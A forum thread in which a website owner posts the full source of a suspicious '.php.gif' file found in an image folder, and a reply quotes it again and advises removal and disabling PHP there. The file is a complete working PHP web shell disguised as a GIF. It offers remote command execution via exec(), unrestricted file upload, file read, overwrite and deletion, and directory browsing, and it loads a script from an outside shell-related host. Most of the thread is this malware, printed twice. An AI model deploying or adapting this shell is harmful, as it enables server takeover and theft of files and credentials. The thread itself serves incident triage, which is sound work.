
HACKING ATTEMPTS?

PostPosted: Sat Aug 06, 2011 10:49 pm
by serjb
Hi,

I found a double-extension file (261691*.php.gif) in the folder ./image/

As far as I can judge it's a PHP shell, or not? And what must I do?

[size=50]GIF89A;
<html>
   <head>
      <title>~~~Own3d by Black PHP Shell~~~</title>
      <style type="text/css">
         a  {
            text-decoration: none;
            display: block;
         }

         a img  {
            border: 0;
         }

         #view tr:hover  {

            background-color: #EEE;

         }

         input:hover  {
            background-color: #EEE;

         }

         form#post  {}


         #post .buttons  {

            background-color: transparent;
            font-family: Arial;
            font-size: 11px;
            color: #222;

         }
      </style>
   </head>

   <body background="http://img34.picoodle.com/img/img34/4/2/8/f_backm_0c905a6.png" link="#444444" vlink="#444444">

      <h1 align="center" style='text-decoration: underline; color: #888;'>

         <i>Black PHP Shell</i>
      </h1>

      <table border=0 style='color: #666; font-family: Courier; font-size: 12px;'>


<?php
# Formats the low nine permission bits of a path as an "rwxrwxrwx"-style
# string: owner, group, then other, with '-' wherever a bit is clear.
# File-type, setuid/setgid and sticky bits in the fileperms() value are not
# represented. The directory listing further down calls this for each
# non-directory entry it prints.
#
# $f      path passed straight to fileperms()
# return  nine-character string, e.g. "rw-r--r--"
function getperms($f)  {
   $mode=fileperms($f);

   $perm='';
   # Owner: read / write / execute
   $perm .= ($mode & 00400) ? 'r' : '-';
   $perm .= ($mode & 00200) ? 'w' : '-';
   $perm .= ($mode & 00100) ? 'x' : '-';
   # Group: read / write / execute
   $perm .= ($mode & 00040) ? 'r' : '-';
   $perm .= ($mode & 00020) ? 'w' : '-';
   $perm .= ($mode & 00010) ? 'x' : '-';
   # Other (world): read / write / execute
   $perm .= ($mode & 00004) ? 'r' : '-';
   $perm .= ($mode & 00002) ? 'w' : '-';
   $perm .= ($mode & 00001) ? 'x' : '-';

   return $perm;
}

# Host fingerprint printed unconditionally on every page load: virtual-host
# name and web-server software string from $_SERVER, plus the php_uname()
# string when that function is callable. Values are printed without HTML
# escaping.
print "<tr><td>Host</td><td><b>".$_SERVER['SERVER_NAME']."</b></td></tr>";
print "<tr><td>Server</td><td><b>".$_SERVER['SERVER_SOFTWARE']."</b></td></tr>";
if (is_callable("php_uname"))
   print "<tr><td>Sistema operativo</td><td><b>".php_uname()."</b></td></tr>";

# When the POSIX functions are callable, also report the UID and GID of the
# PHP process and resolve them to account and group names through
# posix_getpwuid()/posix_getgrgid().
# Triage note: the account shown here is the one the file and command
# handlers below run as, which bounds what this script could read or change.
if (is_callable("posix_getuid") and is_callable("posix_getgid"))  {
   $uid=posix_getuid();
   $uname=posix_getpwuid($uid);
   $uname=$uname['name'];

   $gid=posix_getgid();
   $gname=posix_getgrgid($gid);
   $gname=$gname['name'];
   
   print "<tr><td>UID</td><td><b>$uid ($uname)</b></td></tr>";
   print "<tr><td>GID</td><td><b>$gid ($gname)</b></td></tr>";
}

# Closes the <table> opened in the inline HTML that precedes this PHP segment.
print "</table><br><br>";

# Control panel. Unless a POST field named 'file' is present, the inline HTML
# below emits two forms that post back to the current URL:
#   - a multipart upload form (file field 'userfile', hidden do_upload=true,
#     MAX_FILE_SIZE hint of 200000000 bytes), labelled "Carica un file"
#     (upload a file);
#   - a single text field 'cmd', labelled "Esegui un comando" (run a command).
# NOTE(review): no form visible in this file has a field called 'file', so this
# branch presumably renders on every request. REQUEST_URI is echoed into the
# action attributes without escaping.
if (!isset($_POST['file']))  {
?>

<table border=0>

<form enctype="multipart/form-data" action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
   <input type="hidden" name="MAX_FILE_SIZE" value="200000000"/>
   <input type="hidden" name="do_upload" value="true">
      <tr><td>Carica un file</td></tr>
      <tr><td><input type="file" name="userfile"/></td></tr>
      <tr><td><input type="submit" value="Invia"/></td></tr>
</form>

<tr><td height="20px"></td></tr>

<form action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
      <tr><td>Esegui un comando</td></tr>
      <tr><td><input type="text" name="cmd"></td></tr>
      <tr><td><input type="submit" value="Esegui comando"></td></tr>
</form>
</table>

<?php
}

#

# File upload

#
# Runs when the POST field do_upload is exactly the string "true". The target
# directory is POST 'dirname' when POST 'dir' == "true", otherwise the current
# working directory; the file name is the client-supplied name reduced with
# basename(). No extension, content-type or size check is made before
# move_uploaded_file().
# Triage note: anything the PHP process account can write may have been
# dropped through this handler, so a host that served this page should be
# searched for further unexpected files, not only this one.
# NOTE(review): $_POST['do_upload'] and $_POST['dir'] are read without isset(),
# so requests that lack them raise undefined-index notices/warnings, which may
# show up in the PHP error log.

if ($_POST['do_upload']==="true")  {
   if ($_POST['dir']=="true")
      $dir=$_POST['dirname'];
   else
      $dir=getcwd();

   $uploadfile=$dir."/".basename($_FILES['userfile']['name']);

   # On success the client-supplied name, type and size are echoed back
   # without HTML escaping.
   if (move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile))  {
      print "File caricato con successo<br>\n";
      print "Nome file: <b>".$_FILES['userfile']['name']."</b><br>".
         "\nTipo: ".$_FILES['userfile']['type']."<br>\n".
         "Dimensione: ".$_FILES['userfile']['size']." bytes<br>\n";
   }

   else print "Errore nel caricamento del file ".$_FILES['userfile']['name']."<br>\n";
}

#

# File edit or deletion

#
# Runs when POST 'dofile' is present. The path is taken from that field after
# htmlentities(), so a path containing characters that function rewrites
# (such as & < > ") is altered before it reaches fopen()/unlink(). The new
# content comes unmodified from POST 'content'.
# Triage note: any file writable by the PHP process account could have been
# overwritten or removed through this handler; on an affected host, compare
# application files against known-good copies rather than trusting them.

if (isset($_POST['dofile']))  {
   # $ref is assigned but not used anywhere in the visible code.
   $ref=$_SERVER['HTTP_REFERER'];
   $fname=htmlentities($_POST['dofile']);
   $content=$_POST['content'];

   #

   # Edit (save)

   #
   # Mode "w" truncates the target before the posted content is written.

   if (isset($_POST['save']))  {
      if (!($fp=fopen($fname,"w")))
         die ("Impossibile scrivere sul file <b>$fname</b><br>\n");

      fputs ($fp,$content);
      fclose($fp);

      print ("Modifiche sul file <b>$fname</b> apportate con successo<br><br>\n");
   }

   #

   # Deletion

   #
   # unlink() failure ends the request with an error message.

   if (isset($_POST['remove']))  {
      unlink ($fname) or die ("Impossibile rimuovere il file <b>$fname</b><br>\n");
      print "File <b>$fname</b> rimosso con successo<br><br>\n";
   }
}

#

# Command execution

#
# Runs when POST 'cmd' is present: the field is handed unchanged to exec() and
# each captured output line is printed without HTML escaping. die('') then
# ends the request, so the file viewer and directory listing further down are
# not rendered for command requests.
# Detection note: an exec() call fed directly from $_POST, inside a file that
# sits in an image/upload directory, is a strong web-shell indicator. Because
# the forms use POST, the command text is normally absent from access logs;
# look for POST requests to this file's URL instead.
# Mitigation note: listing exec in the disable_functions ini directive, and
# refusing to execute PHP from upload directories, both neutralise this
# handler.

if (isset($_POST['cmd']))  {
   $cmd=$_POST['cmd'];
   $output=array();
   exec ($cmd,$output);

   print "<br><hr height=1 width=\"100%\">\n";
   print "<i>Risultato del comando:</i><br><br><tt>";

   foreach ($output as $line)
      print "$line<br>\n";
   print "</tt>\n";
   die('');
}

#

# File viewer

#
# Runs when POST 'fname' is present. The named file is read with file() and
# printed, htmlentities()-escaped, inside a <textarea>; a hidden 'dofile'
# field plus 'save' and 'remove' buttons feed the edit/deletion handler above.
# The Italian notice printed first says that editing or deleting is possible
# only when the file is writable by everyone.
# Triage note: every file readable by the PHP process account could have been
# displayed this way, so credentials kept in application configuration files
# on an affected host should be treated as exposed.

if (isset($_POST['fname']))  {
   print "<i>Attenzione: La modifica o la cancellazione di un file ? possibile se e soltanto se ".
      "quel file ha i permessi di scrittura per tutti</i><br><br>\n";

   # The path goes through htmlentities() before file(), as in the edit handler.
   $fname=htmlentities($_POST['fname']);
   $file=file($fname) or die ("Impossibile aprire <b>$fname</b><br>\n");

   print "<form action=\"".$_SERVER['REQUEST_URI']."\" method=\"POST\">\n";
   print "<input type=\"hidden\" name=\"dofile\" value=\"$fname\">\n";
   print "<textarea rows=20 cols=80 name=\"content\">";

   for ($i=0; $i<count($file); $i++)
      print htmlentities($file[$i]);

   print "</textarea><br><br>\n";
   print "<input type=\"submit\" value=\"Salva le modifiche al file\" name=\"save\">\n";
   print "<input type=\"submit\" value=\"Cancella file\" name=\"remove\">\n";
   print "</form>\n";
}

#

# Directory listing

#
# Not gated by any request field: it runs on every request that reaches this
# point (command requests have already ended in die('') above). The directory
# is POST 'dirname' after htmlspecialchars(), otherwise the current working
# directory.

if (isset($_POST['dirname']))
   $path=htmlspecialchars($_POST['dirname']);
else
   $path=getcwd();

# chdir() followed by getcwd() replaces the requested path with the path PHP
# reports for the directory it actually entered.
$dp=opendir($path) or die("Impossibile aprire <b>$path</b><br>\n");
chdir ($path);
$path=getcwd();

print "<div id=\"view\"><hr height=1 width=\"100%\">\n";
print "Directory corrente: <b>".getcwd()."</b><br><br>\n\n";
$dir=array();

# strcmp() returns 0 only for ".", so every entry except "." (".." included)
# is collected as a full path.
while ($file=readdir($dp))
   if (strcmp(".",$file))
      array_push($dir,"$path/$file");

closedir($dp);
sort($dir);

?>
<script type="text/javascript" language="javascript" src="http://r57shell.us/v4/cookie.js"></script>
<form name="post" id="post" action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
<table border=0 width="100%">
<?php
# Renders one table row per entry collected in $dir. Every entry is a submit
# button inside the form opened by the inline HTML just before this segment:
# directories post back as 'dirname' (browse), files as 'fname' (view/edit).
# Paths are placed in value="" attributes without escaping. That same inline
# HTML also pulls a script from an external host, and the row icons are
# fetched from third-party image hosts, so browsing this page generates
# outbound requests from the viewer's browser.
for ($i=0; $i<count($dir); $i++)  {
   print "<tr style='font-family: Arial; font-size: 11px;'>\n";

   #

   # Parent directory

   #
   # Builds the parent path by re-joining every component of getcwd() except
   # the last. split() was removed in PHP 7.0, so on PHP 7 or later this
   # branch stops with an undefined-function error.

   if (basename($dir[$i])==="..")  {
      $tmp=split('/',getcwd());
      $new="";

      for ($j=0; $j<count($tmp)-1; $j++)
         $new .= $tmp[$j]."/";


      print "<td width=\"40px\"><img src=\"http://img32.picoodle.com/img/img32/4/2/8/f_upm_cacf553.gif\" alt=\"..\" width=20 height=20></td>\n";

      print "<td><input type=\"submit\" name=\"dirname\" value=\"$new\" class=\"buttons\"></td></tr>\n";
   }

   #

   # Directory

   #
   # ".." is a directory too, so it is excluded here; it was handled above.

   if (is_dir($dir[$i]))  {
      if (basename($dir[$i])!='..')  {
         print "<td width=\"40px\"><img src=\"http://img34.picoodle.com/img/img34/4/2/8/f_directorym_9967091.gif\" alt=\".\" width=20 height=20></td>\n";

         print "<td><input type=\"submit\" name=\"dirname\" value=\"".$dir[$i].
            "\" class=\"buttons\"></td>\n";
         print "<td>DIR</td></tr>\n";
      }
   }
   
   #

   # Regular file

   #
   # File rows also show the permission string produced by getperms().

   else  {
      if (basename($dir[$i])!='..')  {
         print "<td width=\"40px\"><img src=\"http://img03.picoodle.com/img/img03/4/2/8/f_filem_27c273b.png\" alt=\".\" width=20 height=20></td>\n";

         print "<td><input type=\"submit\" name=\"fname\" value=\"$dir[$i]\" class=\"buttons\"></td>\n";
         print "<td>".getperms($dir[$i])."</td></tr>\n";
      }
   }
}

print "</table></div>\n";
?>
      
      </body>
</html>[/size]

Re: HACKING ATTEMPTS?

PostPosted: Sun Aug 07, 2011 12:45 pm
by SamEA
serjb wrote:Hi,

I found a double-extension file (261691*.php.gif) in the folder ./image/

As far as I can judge it's a PHP shell, or not? And what must I do?

[size=50]GIF89A;
<html>
   <head>
      <title>~~~Own3d by Black PHP Shell~~~</title>
      <style type="text/css">
         a  {
            text-decoration: none;
            display: block;
         }

         a img  {
            border: 0;
         }

         #view tr:hover  {

            background-color: #EEE;

         }

         input:hover  {
            background-color: #EEE;

         }

         form#post  {}


         #post .buttons  {

            background-color: transparent;
            font-family: Arial;
            font-size: 11px;
            color: #222;

         }
      </style>
   </head>

   <body background="http://img34.picoodle.com/img/img34/4/2/8/f_backm_0c905a6.png" link="#444444" vlink="#444444">

      <h1 align="center" style='text-decoration: underline; color: #888;'>

         <i>Black PHP Shell</i>
      </h1>

      <table border=0 style='color: #666; font-family: Courier; font-size: 12px;'>


<?php
# Formats the low nine permission bits of a path as an "rwxrwxrwx"-style
# string: owner, group, then other, with '-' wherever a bit is clear.
# File-type, setuid/setgid and sticky bits in the fileperms() value are not
# represented. The directory listing further down calls this for each
# non-directory entry it prints.
#
# $f      path passed straight to fileperms()
# return  nine-character string, e.g. "rw-r--r--"
function getperms($f)  {
   $mode=fileperms($f);

   $perm='';
   # Owner: read / write / execute
   $perm .= ($mode & 00400) ? 'r' : '-';
   $perm .= ($mode & 00200) ? 'w' : '-';
   $perm .= ($mode & 00100) ? 'x' : '-';
   # Group: read / write / execute
   $perm .= ($mode & 00040) ? 'r' : '-';
   $perm .= ($mode & 00020) ? 'w' : '-';
   $perm .= ($mode & 00010) ? 'x' : '-';
   # Other (world): read / write / execute
   $perm .= ($mode & 00004) ? 'r' : '-';
   $perm .= ($mode & 00002) ? 'w' : '-';
   $perm .= ($mode & 00001) ? 'x' : '-';

   return $perm;
}

# Host fingerprint printed unconditionally on every page load: virtual-host
# name and web-server software string from $_SERVER, plus the php_uname()
# string when that function is callable. Values are printed without HTML
# escaping.
print "<tr><td>Host</td><td><b>".$_SERVER['SERVER_NAME']."</b></td></tr>";
print "<tr><td>Server</td><td><b>".$_SERVER['SERVER_SOFTWARE']."</b></td></tr>";
if (is_callable("php_uname"))
   print "<tr><td>Sistema operativo</td><td><b>".php_uname()."</b></td></tr>";

# When the POSIX functions are callable, also report the UID and GID of the
# PHP process and resolve them to account and group names through
# posix_getpwuid()/posix_getgrgid().
# Triage note: the account shown here is the one the file and command
# handlers below run as, which bounds what this script could read or change.
if (is_callable("posix_getuid") and is_callable("posix_getgid"))  {
   $uid=posix_getuid();
   $uname=posix_getpwuid($uid);
   $uname=$uname['name'];

   $gid=posix_getgid();
   $gname=posix_getgrgid($gid);
   $gname=$gname['name'];
   
   print "<tr><td>UID</td><td><b>$uid ($uname)</b></td></tr>";
   print "<tr><td>GID</td><td><b>$gid ($gname)</b></td></tr>";
}

# Closes the <table> opened in the inline HTML that precedes this PHP segment.
print "</table><br><br>";

# Control panel. Unless a POST field named 'file' is present, the inline HTML
# below emits two forms that post back to the current URL:
#   - a multipart upload form (file field 'userfile', hidden do_upload=true,
#     MAX_FILE_SIZE hint of 200000000 bytes), labelled "Carica un file"
#     (upload a file);
#   - a single text field 'cmd', labelled "Esegui un comando" (run a command).
# NOTE(review): no form visible in this file has a field called 'file', so this
# branch presumably renders on every request. REQUEST_URI is echoed into the
# action attributes without escaping.
if (!isset($_POST['file']))  {
?>

<table border=0>

<form enctype="multipart/form-data" action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
   <input type="hidden" name="MAX_FILE_SIZE" value="200000000"/>
   <input type="hidden" name="do_upload" value="true">
      <tr><td>Carica un file</td></tr>
      <tr><td><input type="file" name="userfile"/></td></tr>
      <tr><td><input type="submit" value="Invia"/></td></tr>
</form>

<tr><td height="20px"></td></tr>

<form action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
      <tr><td>Esegui un comando</td></tr>
      <tr><td><input type="text" name="cmd"></td></tr>
      <tr><td><input type="submit" value="Esegui comando"></td></tr>
</form>
</table>

<?php
}

#

# File upload

#
# Runs when the POST field do_upload is exactly the string "true". The target
# directory is POST 'dirname' when POST 'dir' == "true", otherwise the current
# working directory; the file name is the client-supplied name reduced with
# basename(). No extension, content-type or size check is made before
# move_uploaded_file().
# Triage note: anything the PHP process account can write may have been
# dropped through this handler, so a host that served this page should be
# searched for further unexpected files, not only this one.
# NOTE(review): $_POST['do_upload'] and $_POST['dir'] are read without isset(),
# so requests that lack them raise undefined-index notices/warnings, which may
# show up in the PHP error log.

if ($_POST['do_upload']==="true")  {
   if ($_POST['dir']=="true")
      $dir=$_POST['dirname'];
   else
      $dir=getcwd();

   $uploadfile=$dir."/".basename($_FILES['userfile']['name']);

   # On success the client-supplied name, type and size are echoed back
   # without HTML escaping.
   if (move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile))  {
      print "File caricato con successo<br>\n";
      print "Nome file: <b>".$_FILES['userfile']['name']."</b><br>".
         "\nTipo: ".$_FILES['userfile']['type']."<br>\n".
         "Dimensione: ".$_FILES['userfile']['size']." bytes<br>\n";
   }

   else print "Errore nel caricamento del file ".$_FILES['userfile']['name']."<br>\n";
}

#

# File edit or deletion

#
# Runs when POST 'dofile' is present. The path is taken from that field after
# htmlentities(), so a path containing characters that function rewrites
# (such as & < > ") is altered before it reaches fopen()/unlink(). The new
# content comes unmodified from POST 'content'.
# Triage note: any file writable by the PHP process account could have been
# overwritten or removed through this handler; on an affected host, compare
# application files against known-good copies rather than trusting them.

if (isset($_POST['dofile']))  {
   # $ref is assigned but not used anywhere in the visible code.
   $ref=$_SERVER['HTTP_REFERER'];
   $fname=htmlentities($_POST['dofile']);
   $content=$_POST['content'];

   #

   # Edit (save)

   #
   # Mode "w" truncates the target before the posted content is written.

   if (isset($_POST['save']))  {
      if (!($fp=fopen($fname,"w")))
         die ("Impossibile scrivere sul file <b>$fname</b><br>\n");

      fputs ($fp,$content);
      fclose($fp);

      print ("Modifiche sul file <b>$fname</b> apportate con successo<br><br>\n");
   }

   #

   # Deletion

   #
   # unlink() failure ends the request with an error message.

   if (isset($_POST['remove']))  {
      unlink ($fname) or die ("Impossibile rimuovere il file <b>$fname</b><br>\n");
      print "File <b>$fname</b> rimosso con successo<br><br>\n";
   }
}

#

# Command execution

#
# Runs when POST 'cmd' is present: the field is handed unchanged to exec() and
# each captured output line is printed without HTML escaping. die('') then
# ends the request, so the file viewer and directory listing further down are
# not rendered for command requests.
# Detection note: an exec() call fed directly from $_POST, inside a file that
# sits in an image/upload directory, is a strong web-shell indicator. Because
# the forms use POST, the command text is normally absent from access logs;
# look for POST requests to this file's URL instead.
# Mitigation note: listing exec in the disable_functions ini directive, and
# refusing to execute PHP from upload directories, both neutralise this
# handler.

if (isset($_POST['cmd']))  {
   $cmd=$_POST['cmd'];
   $output=array();
   exec ($cmd,$output);

   print "<br><hr height=1 width=\"100%\">\n";
   print "<i>Risultato del comando:</i><br><br><tt>";

   foreach ($output as $line)
      print "$line<br>\n";
   print "</tt>\n";
   die('');
}

#

# File viewer

#
# Runs when POST 'fname' is present. The named file is read with file() and
# printed, htmlentities()-escaped, inside a <textarea>; a hidden 'dofile'
# field plus 'save' and 'remove' buttons feed the edit/deletion handler above.
# The Italian notice printed first says that editing or deleting is possible
# only when the file is writable by everyone.
# Triage note: every file readable by the PHP process account could have been
# displayed this way, so credentials kept in application configuration files
# on an affected host should be treated as exposed.

if (isset($_POST['fname']))  {
   print "<i>Attenzione: La modifica o la cancellazione di un file ? possibile se e soltanto se ".
      "quel file ha i permessi di scrittura per tutti</i><br><br>\n";

   # The path goes through htmlentities() before file(), as in the edit handler.
   $fname=htmlentities($_POST['fname']);
   $file=file($fname) or die ("Impossibile aprire <b>$fname</b><br>\n");

   print "<form action=\"".$_SERVER['REQUEST_URI']."\" method=\"POST\">\n";
   print "<input type=\"hidden\" name=\"dofile\" value=\"$fname\">\n";
   print "<textarea rows=20 cols=80 name=\"content\">";

   for ($i=0; $i<count($file); $i++)
      print htmlentities($file[$i]);

   print "</textarea><br><br>\n";
   print "<input type=\"submit\" value=\"Salva le modifiche al file\" name=\"save\">\n";
   print "<input type=\"submit\" value=\"Cancella file\" name=\"remove\">\n";
   print "</form>\n";
}

#

# Directory listing

#
# Not gated by any request field: it runs on every request that reaches this
# point (command requests have already ended in die('') above). The directory
# is POST 'dirname' after htmlspecialchars(), otherwise the current working
# directory.

if (isset($_POST['dirname']))
   $path=htmlspecialchars($_POST['dirname']);
else
   $path=getcwd();

# chdir() followed by getcwd() replaces the requested path with the path PHP
# reports for the directory it actually entered.
$dp=opendir($path) or die("Impossibile aprire <b>$path</b><br>\n");
chdir ($path);
$path=getcwd();

print "<div id=\"view\"><hr height=1 width=\"100%\">\n";
print "Directory corrente: <b>".getcwd()."</b><br><br>\n\n";
$dir=array();

# strcmp() returns 0 only for ".", so every entry except "." (".." included)
# is collected as a full path.
while ($file=readdir($dp))
   if (strcmp(".",$file))
      array_push($dir,"$path/$file");

closedir($dp);
sort($dir);

?>
<script type="text/javascript" language="javascript" src="http://r57shell.us/v4/cookie.js"></script>
<form name="post" id="post" action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
<table border=0 width="100%">
<?php
# Renders one table row per entry collected in $dir. Every entry is a submit
# button inside the form opened by the inline HTML just before this segment:
# directories post back as 'dirname' (browse), files as 'fname' (view/edit).
# Paths are placed in value="" attributes without escaping. That same inline
# HTML also pulls a script from an external host, and the row icons are
# fetched from third-party image hosts, so browsing this page generates
# outbound requests from the viewer's browser.
for ($i=0; $i<count($dir); $i++)  {
   print "<tr style='font-family: Arial; font-size: 11px;'>\n";

   #

   # Parent directory

   #
   # Builds the parent path by re-joining every component of getcwd() except
   # the last. split() was removed in PHP 7.0, so on PHP 7 or later this
   # branch stops with an undefined-function error.

   if (basename($dir[$i])==="..")  {
      $tmp=split('/',getcwd());
      $new="";

      for ($j=0; $j<count($tmp)-1; $j++)
         $new .= $tmp[$j]."/";


      print "<td width=\"40px\"><img src=\"http://img32.picoodle.com/img/img32/4/2/8/f_upm_cacf553.gif\" alt=\"..\" width=20 height=20></td>\n";

      print "<td><input type=\"submit\" name=\"dirname\" value=\"$new\" class=\"buttons\"></td></tr>\n";
   }

   #

   # Directory

   #
   # ".." is a directory too, so it is excluded here; it was handled above.

   if (is_dir($dir[$i]))  {
      if (basename($dir[$i])!='..')  {
         print "<td width=\"40px\"><img src=\"http://img34.picoodle.com/img/img34/4/2/8/f_directorym_9967091.gif\" alt=\".\" width=20 height=20></td>\n";

         print "<td><input type=\"submit\" name=\"dirname\" value=\"".$dir[$i].
            "\" class=\"buttons\"></td>\n";
         print "<td>DIR</td></tr>\n";
      }
   }
   
   #

   # Regular file

   #
   # File rows also show the permission string produced by getperms().

   else  {
      if (basename($dir[$i])!='..')  {
         print "<td width=\"40px\"><img src=\"http://img03.picoodle.com/img/img03/4/2/8/f_filem_27c273b.png\" alt=\".\" width=20 height=20></td>\n";

         print "<td><input type=\"submit\" name=\"fname\" value=\"$dir[$i]\" class=\"buttons\"></td>\n";
         print "<td>".getperms($dir[$i])."</td></tr>\n";
      }
   }
}

print "</table></div>\n";
?>
      
      </body>
</html>[/size]


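I should not be alarmed, because PHP will not run the above file with the extension ".gif", as PHP will only process files on the webserver if, and only if, the extension ends with ".php" (unless configured otherwise). That exception matters in practice: some Apache handler configurations treat a file with ".php" anywhere in its name (such as ".php.gif") as PHP, and a script that include()s a path taken from a request will run the file whatever its extension. The "GIF89A;" first line is presumably there so that a check looking only at the leading bytes takes the file for an image. So remove the file, find out how it was uploaded, and make sure PHP execution is disabled in the image folder. This is why it is important to allow only certain image file types, however this does to apply to file uploading.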